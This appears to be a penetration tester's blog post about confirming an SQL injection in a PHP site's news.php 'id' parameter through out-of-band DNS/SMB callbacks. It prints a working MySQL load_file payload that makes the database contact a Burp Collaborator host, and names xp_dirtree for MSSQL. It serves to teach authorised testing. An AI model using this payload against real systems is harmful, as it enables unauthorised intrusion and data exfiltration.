My Pentest Log -12- (Out-Of-Band Sql Injection in MySQL)
Greetings to everyone from Byzantion,
Today, I would like to inform you about the out-of-band sql injection process that I encountered on an application that I was doing web security tests.
1. It has been determined by our project management that I will perform security tests on the “private.com” application.
2. First, as always, after examining the scope form and making the necessary verifications, I started the pentest phases.
3. The target application was a PHP-based web application. So did this have an advantage for us?
PHP applications are generally created with insufficient hardening, so if you carelessly develop applications with PHP, by default, you can miss many problems both in code blocks and during the dynamic execution of the application and cause various vulnerabilities. Starting from here, a security expert who audits PHP applications well can detect small or large problems at different points and enable vulnerability detection.
4. Returning to our topic, I was able to detect various vulnerabilities after reaching a certain stage on the tests of the target application, but the most motivated one among them was the detection of the “Out-of-band Sql Injection” vulnerability.
To explain out-of-band attacks superficially:
From a security point of view, I can say that it is an attack vector where it is possible for a vulnerable application to create TCP/ICMP requests at our request, and sometimes data leaks are provided at the end of these processes, and sometimes it is an attack vector that makes it possible to perform various reconnaissance operations on the application.
However, the possibility of this attack vector today is more difficult than in the past, because advanced security software and hardware (for example, WAF) can prevent the realization of the relevant requests or pull us to different points by making deterrent actions with various surprises.
5. Anyway, I noticed that when I enter a single quote (‘) value on the “id” parameter in the “news.php” file on the target application, the application returns false, and when I enter double quotes (‘’), it returns true. From here, I realized that the application related to the transaction does not perform input control adequately and that the sql queries created by us can be injected into the application.
6. However, this is not enough to verify the vulnerability, I usually try the “time based” attack vector in such cases to verify the vulnerability over delays, but this was not possible on “private.com”. At this stage, I started to think about what I can do and decided to implement the “Out-of-band” attack vector. However, in order for the “out-of-band” attack vector to be possible, the database structure of the relevant application must be authorized to respond to out-of-band, that is, TCP/ICMP requests. The best way to detect this is to determine the database software of the target application and then observe which database software is the detected database software, with which syntaxes that software can create external requests.
7. I was lucky at this point because our client stated that the application uses MySQL software, if not, how could it be detected at this stage?
It can be observed that it is possible to determine through the answers returned at the end of the day by researching which functions and syntaxes and requests can be made by various database software to external applications and then trying all of them one by one. For instance :
Generally “LOAD_FILE” for MySQL and “xp_dirtree” functions and features for MSSQL can be used.
8. If we focus on our topic again, since I know that the target application is mysql:
I noticed that after I created the syntax
“(select load_file(‘\\\\xqrmh34jtln6o5rlozynskiohfn5bu.burpcollaborator.net\\hcibo’))”
and added this query to the relevant parameter and executed the request, several requests were dropped on the collabrator.
9. From here, I verified the sql injection vulnerability that I had detected on the application related to the movement using the out-of-band technique, and by adding the vulnerability to my report, I was able to continue my tests with high motivation at the end of the day.
In summary:
Being aware of the fact that it is possible to control many vulnerabilities we encounter with out-of-band techniques, so that we can verify the existence of the vulnerability more easily and perform the exploitation process can add a more precise security perspective at the end of the day.
